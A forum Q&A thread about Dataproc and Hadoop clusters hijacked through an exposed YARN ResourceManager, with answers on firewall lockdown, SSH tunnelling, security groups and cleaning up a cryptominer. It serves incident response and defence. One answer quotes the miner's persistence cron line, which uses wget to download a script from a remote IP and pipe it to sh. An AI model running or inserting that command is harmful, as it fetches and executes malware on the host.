After a Dataproc cluster is created, many jobs are submitted automatically to the ResourceManager by the user dr.who. This starves the cluster of resources and eventually overwhelms it.
There is little to no information in the logs.
Is anyone else experiencing this issue in Dataproc?
Without knowing more, here is what I suspect is going on.
- It sounds like your cluster has been compromised
- Your firewall (network) rules are likely open, allowing any traffic into the cluster
- Someone has discovered your cluster is open to the public internet and is taking advantage of it
I recommend you do the following immediately:
- Secure the firewall rules you're using to prevent outside access; do not open ports to the public internet
- If you are not using your Cloud Dataproc cluster(s), delete them (see the command after this list)
- If you had any jobs or data on that cluster, you should consider that data as potentially compromised (as anyone could access the cluster)
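For the deletion step, a one-line sketch (the cluster name and region are placeholders, adjust them to your project):

$ gcloud dataproc clusters delete my-cluster --region=us-central1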
If you need to access WebUIs on the cluster, you should use a SOCKS proxy and SSH.
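A minimal sketch of that SOCKS setup, assuming the master node is named my-cluster-m in zone us-central1-a (both placeholders) and Chrome as the browser:

$ gcloud compute ssh my-cluster-m --zone=us-central1-a -- -D 1080 -N
$ google-chrome --proxy-server="socks5://localhost:1080" --user-data-dir=/tmp/my-cluster-m http://my-cluster-m:8088

The first command opens a SOCKS tunnel on local port 1080 without running a remote command (-N); the second starts a separate browser profile that sends all its traffic through that tunnel, so the YARN ResourceManager UI on port 8088 is reachable without opening any firewall ports.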
What is probably happening to you:
- the hacker scans every open vulnerability (IP address + port) and stores it in a breach table
- the hacker scans the breach table and tries to figure out whether or not you launched a cluster recently
- when a vulnerable cluster is available, the hacker connects to it (everything is open and a vulnerability has been found!)
- the hacker connects to your cluster, removes everything (in my case the script is named zz.sh and you can find it in the BitBucket link below), then downloads the mining app
- YARN thinks that workers are failing, but I don't think a real Hadoop application is even running anymore.
I suggest you search your error logs for a bitbucket/github address. You can also look for a wget/apt-get/curl command.
I guess he's rich now.
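A quick way to scan for that (a sketch; /var/log/hadoop-yarn is the usual location of the YARN logs and may differ on your distribution):

$ sudo grep -rEi 'wget|curl|apt-get|bitbucket|github' /var/log/hadoop-yarn/ | head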
Two important things:
- check that your security group configuration is strict enough, without public access allowed everywhere
- check that your SSH key is not compromised.
What you need to do:
The idea is to block unnecessary open ports with an updated security group policy and to use a VPC if needed. I will describe the first option with the main steps to follow.
- [OPTIONAL] change your SSH keys (caution: this can easily break things in your system, so do it carefully)
- go to your EC2 console > Network & Security > Security Groups
- create a new security group and allow connections only between the master and its nodes (you can set an inbound rule's source to another security group)
- use that new security group when launching a new EC2/EMR instance; it should appear when you check the cluster's security configuration (see the sketch after this list)
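A hedged AWS CLI sketch of the last two steps; the group name (emr-restricted), VPC id, security group id, and admin IP (203.0.113.4) are all placeholders:

$ aws ec2 create-security-group --group-name emr-restricted --description "cluster-internal traffic plus admin SSH" --vpc-id vpc-0123456789abcdef0
$ aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 22 --cidr 203.0.113.4/32
$ aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 0-65535 --source-group sg-0123456789abcdef0

The first command prints the GroupId of the new group, the second allows SSH only from your own IP, and the third lets the master and workers talk to each other by referencing the group itself instead of opening ports to the world.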
Related:
- yarn-dr-who-application-attempt-fail
- how-to-use-the-resourcemanager-web-interface-as-an-user
- hdp-261-virus-crytalminer-drwho.html
The virus is a cryptocurrency miner that creates thousands of dr.who jobs like the ones you describe. The jobs are there to "reinstall" the crypto miner if you try to remove it. Here is how to remove the miner permanently.
Check each node for suspicious cron jobs belonging to the yarn user and remove them.
$ sudo -u yarn crontab -e
The malicious entry looks like this (it re-downloads and runs the miner every two minutes):
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
Then check for a "java" process like this one and kill it.
/var/tmp/java -c /var/tmp/wc.conf
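Putting both steps together, a minimal per-node clean-up sketch (it assumes the exact cron entry and file paths shown above; adapt it if your infection looks different):

$ sudo -u yarn crontab -l | grep -v 'cr.sh' | sudo -u yarn crontab -
$ sudo pkill -f '/var/tmp/java'
$ sudo rm -f /var/tmp/java /var/tmp/wc.conf

The first line reinstalls the yarn user's crontab without the downloader entry; the next two kill the fake "java" binary and delete its files.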
You also need to secure all incoming ports to your cluster to prevent this from coming back, especially the ResourceManager ports.
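On the GCP side, a sketch of what that can look like (the rule name allow-all-ingress and the dataproc-cluster network tag are placeholders; the culprit is usually a custom rule that allows ingress from 0.0.0.0/0):

$ gcloud compute firewall-rules list
$ gcloud compute firewall-rules delete allow-all-ingress
$ gcloud compute firewall-rules create dataproc-internal --direction=INGRESS --action=ALLOW --rules=all --source-tags=dataproc-cluster --target-tags=dataproc-cluster

The replacement rule only allows traffic between instances carrying the same network tag, so the ResourceManager is no longer reachable from the internet.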
See this for more info too. https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html
GCP:
If you have to, change your security group's default SSH rule so that it only allows tcp:22. I think it will help you solve your problem.
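As a sketch, assuming the default network's default-allow-ssh rule and a placeholder admin IP (203.0.113.4), that restriction can be applied with:

$ gcloud compute firewall-rules update default-allow-ssh --allow=tcp:22 --source-ranges=203.0.113.4/32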